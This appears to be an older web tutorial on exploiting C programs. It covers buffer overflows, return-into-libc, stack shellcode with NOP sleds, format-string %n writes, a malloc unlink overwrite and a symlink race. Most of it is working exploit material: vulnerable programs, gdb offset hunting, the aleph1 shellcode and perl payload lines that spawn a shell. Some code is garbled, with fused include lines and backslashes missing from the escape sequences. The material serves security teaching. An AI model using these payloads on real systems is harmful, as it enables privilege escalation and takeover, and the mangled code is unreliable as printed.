| Javascript Feeds RSS Feed Security Dashboard | SearchSecurity.com |
The goal of exploitation is to simply make a computer system do something you want it to do, but it is not supposed to do. This really could mean anything, but there are a number of common ways for this to be interpreted. When attacking a remote system, most often it is desired to be able to run code on it. The code may be running as a non privileged user, but anything is a start. Attacking a system when you have the ability to run code on it, or locally, usually implies that the attacker wants to have more control over the system. In multiuser systems this is becoming the administrative user. Other times it may involve getting a webstore to sell you something for nothing. It may mean returning database entries that you desire information on. It really is anything that you want to do, but are not allowed to by the system.
A classic method when exploiting programs is escalating privileges. The idea here is that different programs run with different sets of permissions. If you can get a program with more permissions than you to run some bit of code, then you effectively have all the privileges of the program that you are exploiting. On many machines exploiting a system process would mean that you have full administrative access on that machine.
The following is a list of general levels of access to a system. Exploitation is figuring out a way to get a higher level of access from something that has it, or can give it to you.
The basic memory overflow is where most exploit writers start their career at. To the computer, memory is not a set of variables, arrays, and code. It is one giant addressable street, with bits stored at every address, be they code or data. This layout of memory means that whenever programs are written, variables in one function are often stored next to each other in memory. As a consequence, if the program does not correctly interact with memory, it is possible to get it to write to things it should not be writing to.
Take this program for example.
#includeint main(int argc, char ** argv) { char str2[8]; char str1[8]; str1[8] = 'A'; str1[9] = 0; printf("%sn",str2); return 0; }
If you compile the above program on most x86/Linux machines and run it, you will get the program to print out 'A'. As you see, we added the character 'A' to str1, not str2, which is what was printed out. How did that 'A' get into str2? It is because of the variables being adjacent in memory, arrays in C don't tell the programmer when they try to write past then end of the array.
You might wonder how this technique could possibly be used to exploit a program. After all, what programmer would do something so obviously incorrect as the above example. Well here is a small program that might actually provide useful functionality, but could be exploited with the basic memory overflow technique.
#include#include int main(int argc, char ** argv) { char str2[32]; char str1[32]; if (argc <= 1) return 0; strcpy(str2,"echo This is a shell command"); strcpy(str1,argv[1]); printf("Argument1: %sn",str1); system(str2); }
Normally this program will print out the first argument passed to the program, and run the command echo This is a shell command via the system shell. The problem here is if someone specifies an argument on the command line that is bigger than str1[32]. In that case strcpy will keep on copying the string and not stop until it is all copied.
For reference this is the layout of the memory. [-------str1-------][------str2-------]
Normally str1 will have the contents of argv[1] (the first argument) and a null byte after the copy. However if an attacker runs it with padding to fill up str1, then a command they want to run so it starts at the beginning of str2, then the program will the command of whatever string is in str2.
The attack:
$ gcc testfile2.c $ ./a.out Test Argument1: Test This is a shell command $ ./a.out aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapwd Argument1: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapwd /home/mike $
This same technique can even be used to change values of other kinds of variables. Lets take the case where an integer is stored after one of our strings, and we can overflow into it. For the case of 32 bit machines, integers are 4 bytes. In the intel architecture, which is little endian, the bytes are stored with the least significant byte first. What does this mean? Well, if you have the number 1 in an integer variable in memory it would look like this.
0x01 0x00 0x00 0x00
We also know that characters are exactly one byte. This tells us that if we overwrite the first byte of our integer with a space character, the front byte will be 0x20, the hexadecimal code for the ASCII space character. It may be helpful to have an ASCII chart on hand, along with a calculator for converting decimal to hexadecimal. Don't worry about knowing the entire table, as we will talk about a better method of choosing characters to insert in a bit. For now let's look at another vulnerable program.
#include#include int main(int argc, char ** argv) { int test1; char str1[8]; if (argc <= 1) return 0; test1 = 0; strcpy(str1,argv[0]); if (test1 == 0) printf("test1 is zeron"); else printf("test1 is decimal %d hex %xn",test1,test1); return 0; }
So, now that you know how the memory is laid out, you see that there will be 8 bytes of str1, then 4 bytes for the test1 integer. The plan will be to provide a 9 character argument to the program. Eight to fill str1, and one to change the value of test1. Here is the sample run with that test1.
$ gcc testfile3.c $ ./a.out aaaaaaaa9 test1 is zero $
This was not what we expected. The character corresponding to '9' should have been written to the first byte of test1. The reason is actually somewhat obscure, but in certain cases the compiler will optimize the code and where it stores variables in memory. It is often much faster to waste a small bit of space and have variables be located on a 4 or 8 byte boundary instead of crossing one but having all the variables right next to each other. We could keep guessing sizes until we find the right one, but the proper technique, and one that will be faster in more advanced cases, is using a debugger. The one of choice here will be gdb, so let's take a hack at it and find out how far the start of test1 is from the start of str1.
$ gcc -g t3.c $ gdb ./a.out (gdb) break main Breakpoint 1 at 0x80483d4: file t3.c, line 8. (gdb) run Starting program: /home/user/a.out Breakpoint 1, main (argc=1, argv=0xbffff534) at t3.c:8 8 if (argc <= 1) (gdb) print &test1 $1 = (int *) 0xbffff4e4 (gdb) print &str1 $2 = (char (*)[8]) 0xbffff4d8 (gdb) quit The program is running. Exit anyway? (y or n) y $
What we are doing here is compiling the program with debugging support with the -g option. This allows us to use the debugger with the symbolic names of the variables. We open the debugger on our new executable. Then we tell it to break execution when it reaches the main function. Issuing the run command tells gdb to start running the program, until it hits a breakpoint. Once it is stopped, everything should now be loaded into memory, so we can examine the addresses of the variables with the print &variable statement. Doing that on both variables, and subtracting the two, shows that they are 0xc, or 12 apart. That means we have to put in 12 characters before we hit test1. Let's try out that theory.
$ ./a.out abcdabcdabcd test1 is zero $ ./a.out abcdabcdabcda test1 is decimal 97 hex 61
Perfect! We were able to precisely determine the offset between the two variables and correctly use that to manipulate the values of test1.
Now that you have made it through the basic memory overflow technique, lets look at what else you can potentially overflow in the memory. The previous attacks were interesting, but they did have one potential issue for an attacker, and that is they must be able to change the variable in a way that benefits them in the later code. They face numerous problems, not having the code, the code not doing anything beneficial in any case, and the possibility of the variable being overflowed not having any other variables after it.
What attackers would often want is a quick and easy way to completely gain control of the program by overflowing some other important part of the program. This isn't as hard as it sounds if we look at how the compiler implements function calls.
As you know from programming, every time you call a function it has its own copy of its local variables. With a call to a recursive function that goes 200 iterations deep, there should be 200 copies of its local variables in memory somewhere. There also should be an easy way of addressing each of these, and a way to return back to where you were after the function is done executing. A quick examination of how flow control works shows that you will enter one function from the next and return back in the exact same order the functions were called in. So if you called func1, then it called func2, and that called func3, the return order should be func3 to func2 and then back to func1. This is a stack and exactly how the computer implements it.
The basis of the functions local memory space is the stack frame. The start of the stack frame is stored in a register called ebp, or the base pointer. Whenever a program wants to look up a local variable, it does it by looking at the base pointer address plus some constant offset from that. Instructions are executed by the processor at whatever memory location the register eip is pointing to. Ah ha you think! Just overwrite the eip address with something of our choosing in order to take over flow control for the program. Its not quite that simple though because registers are not part of the continuous memory space. How you actually do change eip isn't that much more complicated though.
Thinking about this implementation of a function as a frame starting at wherever ebp points to and code executing at whatever eip points to means that these two important values must be saved whenever we call another function and easily restored when that function returns. This task is easily solved by pushing the two register values onto the top of the stack, or after the function's frame.
Here is the function frame layout in memory. <-Bottom of stack Top of stack -> [var1][var2][var3][padding][var4][var5] ^ ----- ebp register points here eip register points to some point in function code elsewhere in memory.
From this we see that the variables are expressed as a negative offset from ebp. We can
verify this from the disassembly of some code in gdb. Comparing a variable to zero looks like
this. 0x08048401
Moving on from here, we see that when we call a function, we must preserve ebp and eip so we can continue execution where it was left at. To do this the machine issues a push instruction on the ebp and eip registers to push them on the end of the stack.
After the push, the memory looks like this.
<-Bottom of stack Top of stack ->
[var1][var2][var3][padding][var4][var5][savedeip][savedebp]
^
ebp register points here now---------------------------
eip register points to some point in function code elsewhere in memory.
What we see here is that the new frame starts at [savedebp] and continues on. This provides an interesting opportunity. If in the function we just called, we could overwrite the value of eip to point somewhere else, we could take control of the program. Let's look at the function frame after we get into the other function.
#include.h; #include .h; void func1() { printf("Hello World!n"); exit(1); } int main(int argc, char ** argv) { int * x; x = &x + 2; *x = func1; }
If you compile and execute this program with gcc/x86/linux you will have the string Hello World! printed out the screen. How is this possible? We made the pointer equal to its own location, and forwarded it by two. It should be in the middle of the x pointer right? Well, thats something that can really bite you when working with pointers in C. When you add a number to a pointer in C, it doesn't add one byte, it adds one unit length for the type of pointer you are working with. In this case the pointer is to an int, and ints are 4 bytes long, so actually we forwarded the pointer by 8 bytes, or exactly onto the saved eip. We then overwrite what is at that address with the address of func1. So whenever main returns, instead of returning into the linker code that called it, it returns to func1.
You might be thinking, well how useless is that! Who cares if you can return into some other function, you won't be able to pass variables, and even if you could, what useful functions are there to return into?. Well you actually can pass arguments to functions, since all they do is get them off the stack. Lets give it a try with a modified program.
#include#include void func1(int x) { printf("Hello World! %dn",x); exit(1); } int main(int argc, char ** argv) { int * x; x = &x + 2; *x = func1; x = &x + 4; *x = 0x1; }
When we compile and run this program, Hello World! 1 is printed out!. This is a trivial case, but what useful function could we return into? A quick look around libc and we remember that the system(char *) call will run the string you pass to it as if you typed it into the shell. We pass strings by passing the address to the start of their character array, so lets try to return into system and make it run /bin/ls.
#include#include int main(int argc, char ** argv) { int * x; x = &x + 2; *x = func1; x = &x + 4; *x = "/bin/ls"; }
If we compile and run this, it does exactly what we thought it would! It runs /bin/ls. You may be wondering about why we added 4 to the original address of x instead of 1,2 or 3. Just remember that we are adding to actual location of x in main, not based on where it was before. There also is 4 bytes of space before the arguments start following the end of the frame. This is all great because we are just using C's linker to get all the addresses automatically and not doing any overflows from the command line. So lets try to exploit one of these programs from the command-line.
#include#include int main(int argc, char ** argv) { char str1[8]; char * env1 = getenv("VAR1"); char * env2 = getenv("VAR2"); printf("address of env2 0x%xn",env2); printf("address of system 0x%xn",system); strcpy(str,env1); }
Running the program we get the following output.
$ VAR1=h VAR2=h ./a.out address of env2 0xbffff69d address of system 0x8048320 $
From what we have learned before, this means we want to change the saved eip to the address of system, then have 4 bytes of blank space, then the address of env2, which we will have set to /bin/sh. So we will have a string of length 8 to fill str1, 4 bytes to get past ebp, 4 bytes that are the address of system, another 4 bytes of nothing, then 4 bytes that are the address of VAR2. So lets build one based on the values we have above.
$ VAR1=`perl -e 'print "AAAAAAAAAAAAx20x83x04x08AAAAx95xf6xffxbf"'` VAR2=/bin/sh ./a.out address of env2 0xbffff697 address of system 0x8048320 sh: line 1: 2=/bin/sh: No such file or directory Segmentation fault $
That didn't work. We made the string in VAR1 just as described. We wrote the addresses in the string in little endian form, everything we should have done, but it didn't work. The problem here if we look closer is more subtle. The address of env2 changed! Why was that? It happened because we added more things to the environment, and it pushed our string back, so lets rerun the exploit string with the new address value.
$ VAR1=`perl -e 'print "AAAAAAAAAAAAx20x83x04x08AAAAx97xf6xffxbf"'` VAR2=/bin/sh ./a.out address of env2 0xbffff697 address of system 0x8048320 sh-2.05b$ exit Segmentation fault $
It worked that time, and we got a shell. If we were so inclined to do so, we could have used gdb to obtain the addresses for system and env2 like we did when we first started exploiting memory overflows. For further information please see the Phrack article on return into libc exploits at http://www.phrack.org/show.php?p=58&a=4.
The previous technique described was the return into libc technique. It is often described as more advanced than the technique we will learn here, but that is an arguable point. The advantage of that technique over this one is that it will let you take over a program that is running with a system that has a non executable stack patch. This is basically a cheap way to stop the kind of exploits that I will talk about here, which is where we put machine code on the stack and point the return address to that. Although this technique is defeated by a non executable stack, no many systems have such a security mechanism. Also, if libc's system call is not loaded into memory, then you will have to go through the trouble of assembling a series of function calls that will do exactly what you want. It is often easier to just provide some machine code into the buffer you are overflowing and just run that.
From the earlier article this is what a function frame looks like.
<-Bottom of stack Top of stack ->
[var1][var2][var3][padding][var4][var5]
^
----- ebp register points here
When you call a function, it then looks like this.
<-Bottom of stack Top of stack ->
[var1][var2][var3][padding][var4][var5][savedeip][savedebp][var1][var2]...
^
ebp register points here now---------------------------
Variables are written right to left in this notation.
So if we want to run our own machine code, we will overflow var1 or var2 with a string that has machine code in it, overwrite savedebp, overwrite savedeip with the address of var1 or var2, and wait for the function to return and start executing the code we provided. There are several challenges with this technique though. The first challenge is the machine code. In order to get strcpy to keep going, it must not encounter any 0 bytes, or it will think it hit the end of the string. You also must provide the exact address of var2, or the CPU will start executing at an incorrect place and the program will most likely crash.
So here's the list.
1) Machine code with no null bytes
2) Exact address of variable in EIP
Solving the first problem is beyond the scope of this article, and requires extensive experience in writing assembly. There are plenty of readily available shellcode for download, and articles to describe writing them in a position independent manner and without null bytes.
The second problem is more tractable for us. There is a way to be able to use a more approximate address for the shellcode and still have it run. Since the buffers we are going to overflow are often quite long relative to the shellcode, we would have to pad the extra space with some character. Instead of using padding for a character, we could just extend the shell code to have some large beginning that did nothing until it reached the actual code. The intel architecture provides just this mechanism with the NOP instruction. NOP stands for No-OPeration, and it is one byte in length, that byte being 0x90. So if we provide a bunch of 0x90 bytes before the shellcode, we could return into anywhere where those NOPs were, and the CPU would keep executing them until it hit the shell code.
The problem of locating where EIP is relative to the variable is a much easier problem if we use a debugger. Since the addresses of variables are hard-coded into the program as a relative offset from ebp, they will always be that same offset from ebp. From looking at the previous stack frame pictures, we see that ebp points to the saved ebp, and right behind that is the saved eip. So all we have to do is find out how far the variable is from ebp, add 4 bytes to that, and we are pointing at the saved eip. So lets take a look at a vulnerable program.
#include#include int main(int argc, char ** argv) { int x,y,z; char buf[512]; char * env = getenv("VAR1"); if (env == 0) return 0; strcpy(buf,env); }
Now we have a program that has a buffer, some extra variables in the way, and a vulnerable strcpy. Let's find out where EIP is, and where buf is so we can return into it.
$ gcc -g t6.c
$ gdb a.out
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483d7: file t6.c, line 8.
(gdb) run
Starting program: /home/user/a.out
Breakpoint 1, main (argc=1, argv=0xbffff534) at t6.c:8
8 char * env = getenv("VAR1");
(gdb) print &buf
$1 = (char (*)[512]) 0xbffff2d0
(gdb) info registers ebp
ebp 0xbffff4e8 0xbffff4e8
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
So we have found that the difference between ebp and buf is 0x4e8-0x2d0 or 0x218 (536 in decimal). So that means the saved ebp is 0x218 bytes away from buf, and the saved eip is just 4 bytes past that, or 0x21c bytes (540 decimal). This has also given us the address we want to put in there, the address of buf, or 0xbffff2d0. The address of buf won't always be this, it will change a bit when we start putting environment variables in memory, but we will be able to guess at it with this as a starting point and let the NOPs take care of the rest. First let's get some shell code.
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh";
This is the default phrack 49-14 shellcode by aleph1. It is 45 bytes long. Now we can do our calculation of how to construct the exploit code. The saved EIP is 540 bytes from buf. The last 4 bytes will be our guess as to the start of buf. The 4 bytes before that will be some character to overwrite the saved ebp. This gives us 536 bytes left. The last 45 bytes of that will be the shell code, so that makes 491 bytes of NOPs at the beginning of the buffer. Here is how we will print it out with perl.
$ VAR1=`perl -e 'print "x90"x491,"xebx1fx5ex89x76", "x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3", "x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdc", "xffxffxff/bin/shAAAAxd0xf2xffxbf"'` ./a.out sh-2.05b$ exit $
It worked, and the first time, but the actual address for buf changed a little. You may have to change the address a little, and usually by subtracting from it, and quite often in increments about half of the size of the exploit string. In this case by adding a print statement to the vulnerable program, I discovered the real address of buf was 0xbffff160, however the exploit still worked because it landed into the NOPs.
In your travels it may be useful to get a core dump to see if you overwrote EIP. In this case you should attempt to overwrite it with a character, such as 'A'. In order to get a coredump you may have to issue the command ulimit -c unlimited. You will get the message Segmentation fault (core dumped) if a corefile was dumped. To use it run gdb ./a.out core.#### where .#### is the number of the pid of the process, although some systems just leave it as core. When in gdb type info registers eip. It will show 0x41414141 if you have correctly overflowed the saved eip register with 'A's and the function returned. If you overflow it with an actual address, it probably won't show anything meaningful. One strategy to use when trying to find experimentally in this manner where the saved EIP is located, is to use other characters, and look which characters EIP is set to in the core dump.
Here is a sample session using a core file to locate the saved eip. $ VAR1=`perl -e 'print "A"x544'` ./a.out Segmentation fault (core dumped) $ ls core* core $ gdb ./a.out core GNU gdb 6.1.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1". Core was generated by `./a.out'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) info registers eip eip 0x41414141 0x41414141 (gdb) quit $
The classical paper on buffer overflows is at http://www.phrack.org/show.php?p=49&a=14.
#include#include int main(int argc, char ** argv) { char * env = getenv("VAR1"); char stz[1024]; if (env == 0) return 0; strncpy(stz,env,1024); stz[1023] = 0; printf(env); }
It is possible to view any memory location with this code. To do so you need to determine how far away the string is in the stack. This is easy because we can examine the stack by sending in %08x format specifiers to read ints off the stack. A sample string to read off the location in the stack will look like this AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x... All the user has to do is look where 41414141 occurs, and this is the beginning of the string. What use is this? Well if we specify some other bytes there and use %s, it will be treated like a pointer! Let's give this a try.
$ VAR1=`perl -e 'print "AAA0%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'` ./a.out AAA0bffff66e.00000400.00000000.00000005.400008fc.40000258.40000000.30414141.78383025 $
So it appears that the 8th specifier leads to the front of the string. So now if we replace the 8th specifier with %s, and the first 4 characters with an address in little endian notation, we can get printf to print out whatever is at that address up to a null byte.
$ VAR1=`perl -e 'print "x73xf6xffxbf%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s"'` ./a.out söÿ¿bffff675.00000400.00000000.00000005.400008fc.40000258.40000000.1=söÿ¿%08x.%08x.%08x.%08x.%08x.%08x.%08x.%s $
Replacing the 8th specifier with %s, and having the start of the string be a pointer to env caused the original VAR1 environment variable be printed out at the end of the string! Now for a moment lets look at some other code that is vulnerable to a format string attack.
#include#include void func1() { printf("Hello, World!n"); exit(1); } int main(int argc, char ** argv) { char stz[64]; char * env = getenv("VAR1"); if (env == 0) return 0; if (strlen(env) > 64) return 0; printf("func1 at %xn",func1); sprintf(stz,env); }
At first glance it appears that an overflow is not possible with this code, as the boundary of env is checked. This assumption is incorrect though, as we previously witnessed a small specifier in a format string can make a large output. Say we specify %100x in $VAR1, the program will crash with a segmentation fault. So before we try to exploit this, lets see where the saved EIP is relative to stz.
$ gdb ./a.out
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804844c: file t8.c, line 12.
(gdb) run
Starting program: /home/user/a.out
Breakpoint 1, main (argc=1, argv=0xbffff514) at t8.c:12
12 char * env = getenv("VAR1");
(gdb) print &stz
$1 = (char (*)[64]) 0xbffff480
(gdb) info registers ebp
ebp 0xbffff4c8 0xbffff4c8
(gdb) The program is running. Exit anyway? (y or n) y
$
0x4c8-0x480 give us 0x48, or 72 decimal. That means we should be able to do %71d and have it not crash, but %72 should write one byte of the saved ebp over with a null byte. %76d should overwrite the saved ebp completely, and one byte of the saved eip with a null. Testing this out, the theory proves correct, and the program crashes as soon as we use %76d. (Sometimes it may crash earlier, if a corrupt ebp when restored leads to such a situation). It is not too difficult to test the theory of overwriting the saved EIP out. Let's try a string of %76dAAAA. The %76d should write 76 bytes, and AAAA will be placed over the saved eip.
$ export VAR1=%76xAAAA $ gdb ./a.out GNU gdb 6.1.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1". (gdb) run Starting program: /home/user/a.out func1 at 8048424 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info registers eip eip 0x41414141 0x41414141 (gdb) quit The program is running. Exit anyway? (y or n) y $
Okay, now that we see its possible, lets replace the AAAA with the address of func1 that we are printing out.
$ export VAR1=`perl -e 'print "%76xx24x84x04x08"'` $ ./a.out func1 at 8048424 Hello, World! $
It is now a trivial exercise to extend this into a technique where we can run shellcode in our string. All we have to do is tack the shellcode onto the end of our string, perhaps with some NOP instructions in front, and return into the NOPs. Finding the return address is even easier if you can print things off the stack, as the 0xbf...... values are saved ebp pointers, or addresses very close to where you are trying to hit. You can use them as a starting point.
Let's give it a try. Here is a slightly modified program.
#include#include int main(int argc, char ** argv) { char stz[64]; char * env = getenv("VAR1"); if (env == 0) return 0; if (strlen(env) > 64) return 0; printf("stz at %xn",stz); sprintf(stz,env); }
The exploit string will look something like this, %76xAAAAshellcode. The easy thing to do would be to modify the exploit that we used in the previous section.
$ export VAR1=`perl -e 'print "%76xAAAA","xebx1fx5ex89x76", "x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3", "x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdc", "xffxffxff/bin/sh"'` $ ./a.out stz at bffff460 Segmentation fault $
The trick now is to make the address that we return equal to stz+76+4. With the address printed out here that would be 0xbffff4b0. So lets run that again with the computed value for the return address.
$ export VAR1=`perl -e 'print "%76xxb0xf4xffxbf","xebx1fx5ex89x76", "x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3", "x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdc", "xffxffxff/bin/sh"'` $ ./a.out stz at bffff460 sh-2.05b$ exit $
Once again we have successful exploitation. Its not yet time for celebration. The first program we listed is not exploitable using this technique! Let's look at it once again.
#include#include int main(int argc, char ** argv) { char * env = getenv("VAR1"); char stz[1024]; if (env == 0) return 0; strncpy(stz,env,1024); stz[1023] = 0; printf(env); }
What we really need in this program is the ability to overwrite the saved EIP, but there isn't a way to make the format string grow in memory. Take a moment to recall what we did with printing out any location of memory. We were able to create arbitrary pointers and read from them. Well it just so happens that there is another format specifier that lets us write to a pointer. That specifier is %n, and writes to the pointer currently being pointed to the number of characters printed out so far. What use is that? Well we do control how many characters printed out so far with the %###d format specifier. That alone isn't going to let us change the saved eip to something useful. EIP is usually a number well into the millions. printf just isn't going to work that way for us. The trick is to issue multiple writes that overlap in a manner that is beneficial to us. Remember that little endian notation you have to write all the addresses in? Now it will benefit us. Each time we will increment the location we write to by one byte, with the end result of four consecutive bytes that correspond to the least significant byte of each int written. This sounds somewhat complicated, so just take a look at this picture.
saved eip
41414141
08000000 first write
04000000 second write
dd000000 third write
ee000000 fourth write.
0804ddee result in saved eip.
Now that looks something more like a real return address. So how will we exploit it? We'll create 4 pointers that correspond to the addresses we wish to write to, and then we will carefully control the last byte of the number of characters we have written.
A sample exploit string. AAAABBBBCCCCDDDD%08x%08x%08x%08x%08x%08x%08x%n%8d%n%10d%n%80d%n
This exploit string has 4 pointers to do the 4 writes, some %x statements to load the first pointer so %n gets it as an argument. Also included are %###d statements to control the number of characters printed out. We need to increase the numberprinted % 256 to the byte we want to write. In the case where numberprinted % 256 is less than the number for the byte we wish to print, then we will just do %###d where ### is the number we need to add in order to get to the target byte. In the other case where we have already passed it, we must add enough to wrap around back to the target byte in modulo arithmetic.
Let's make some minor modifications to the program to enable easy exploitation.
#include#include void func1() { printf("Hello World!n"); exit(1); } int main(int argc, char ** argv) { int x; char * env = getenv("VAR1"); char stz[1024]; if (env == 0) return 0; printf("x: %xn",&x); printf("func1: %xn",func1); strncpy(stz,env,1024); stz[1023] = 0; printf(env); }
Once again let's find the offset between x and eip.
$ gdb a.out
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048457: file t10.c, line 14.
(gdb) run
Starting program: /home/user/a.out
Breakpoint 1, main (argc=1, argv=0xbffff594) at t10.c:14
14 char * env = getenv("VAR1");
(gdb) print &x
$1 = (int *) 0xbffff53c
(gdb) info registers ebp
ebp 0xbffff548 0xbffff548
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
0x548-0x53c = 0xc or 12 decimal. So we should add 12+4 to the address of x to get to the saved eip. Let's apply this.
$ export VAR1=`perl -e 'print "AAAABBBBCCCCDDDD%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"'` $ ./a.out x: bffff54c func1 8048424 AAAABBBBCCCCDDDDbffffe44.00000400.00000000.00000005.400008fc.40000258.40000000.41414141.42424242.43434343.44444444 $
We'll modify the string to pointers to 0xbffff54c+12+4 and (+1,+2,+3). We'll also change the last four specifiers to %n.
$ export VAR1=`perl -e 'print "x5cxf5xffxbfx5dxf5xffxbfx5exf5xffxbfx5fxf5xffxbfaaaaaaaaa%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n.%n.%n.%n"'` $ ./a.out x: bffff54c func1 8048424 Segmentation fault (core dumped) $ gdb ./a.out core GNU gdb 6.1.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1". Core was generated by `./a.out'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x5b5a5958 in ?? () (gdb) quit $
So far we have succeeded in modifying eip, now lets change those values of 0x58 0x59 0x5a 0x5b to 0x24 0x84 0x04 0x08 (or the address of func1). First 0x58 + 0xCC = 0x24 mod 256d. 0xCC is 204 in decimal, so we will add %204d to the string right before the first %n. and remove the previous %x. and add the number of characters needed to balance the string according to the 8 fewer characters that are lost from the %08x. This is the tedious part, but continued computation will lead to the correct address being written into the saved eip.
The best source of information on format strings is scut of TESO's paper at http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html
One of the more advanced techniques does not directly overflow the memory, but uses overflows a structure, which then influences the execution of the program. The technique is the malloc overflow. It is not the subject of this paper to discuss how exactly malloc works, but the general idea is it allocates memory upon request, and frees it up when you say you are done with it. One of the things that is involved in this chunked allocation is making sure free chunks don't turn into fragments. The basic layout of a chunk is the following.
previous_size (4bytes) size (4bytes) forward_pointer (4bytes) reverse_pointer (4bytes)
When a block is allocated, only previous_size and size are in use. Basically previous_size and size allow the system to traverse the physical blocks in the memory, allocated or not. Subtracting previous_size from the address of the current block gets you the previous block, adding size to this one gets you the next. When a block is freed, the forward and reverse pointers point to other blocks that are also free. The way the free block list is laid out is usually a doubly linked list. This brings up one last operation, which is coalescing. Whenever a block is freed, and the next block is also free, then the system will put the two together into one larger free block. During this operation the second block must be removed from the free list, which is the standard algorithm for removing a node from a doubly linked list.
One trick of exploiting malloc is that if you can convince it that the next block is free, and that block after that has PREV_INUSE set to 0, then it will run an algorithm that ends up using prev and next pointers that you are able to specify for this list removal proceedure. The end result is that you can write the value of reverse_pointer to the address of forward_pointer - 12 (-12 for the offset of the chunk size). The following is an example of how such memory manipulations make execution of code possible. A remote exploitation would overwrite a function pointer in the dynamic linker or a saved eip instead of the local function pointer.
#include#include char shellcode[] = "xebx0appssssffff" "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" "x80xe8xdcxffxffxff/bin/sh"; void bar() { printf("Not Today!n"); exit(1); } int main(int argc, char ** argv) { void (*fptr)(void); int * blob; int * blab; fptr = bar; blob = malloc(1024); blab = malloc(1024); *(blab-2) = ~0x1; *(blab-1) = -4; *(blab) = &fptr - 3; *(blab+1) = shellcode; free(blob); fptr(); free(blab); }
Once you find such vulnerable code, the standard method of overwriting eip or even a function pointer in the dynamic linker will work for taking control of execution. One thing to be aware of is in the block that is getting freed, the first 8 bytes will be overwritten by forward and reverse pointers. This is only a taste of the topic, which is limitless in possibilities for exploitation and creativitiy. For a more detailed discussion on the topic see http://www.phrack.org/show.php?p=57&a=8
#include#include #include int main(int argc, char ** argv) { struct stat sbuf; int ret; ret = lstat("/tmp/lockfile",&sbuf); if (!S_ISLNK(sbuf.st_mode)) { chown("/tmp/lockfile",getuid(),getgid()); } unlink("/tmp/lockfile"); }
At first glance this code appears to prevent the attack where someone makes /tmp/lockfile a symlink somewhere else, however there is a special case here. What happens if someone creates a link called /tmp/lockfile between the time lstat returns and when chown() is called? This subtle problem is the race condition.
Creating an exploit for this program is not too difficult. All we have to do is keep running a program to create a link to another file over and over, and another to run this program. This isn't too difficult with a small shell script.
#!/bin/bash while true; do ln -s /tmp/victim /tmp/lockfile& ./a.out& done
After running this script for a while it will eventually chmod the victim file. In fact many things that are similar suffer from the same problem. The following program suffers from a race condition flaw. The problem lies in that the sig function can be interrupted and run again, which is incompatible with the malloc and free model of memory management.
#include#include void * buf1, * buf2; void sig(int tint) { free(buf1); free(buf2); } int main(int argc, char ** argv) { signal(SIGHUP,sig); signal(SIGTERM,sig); sleep(100); }
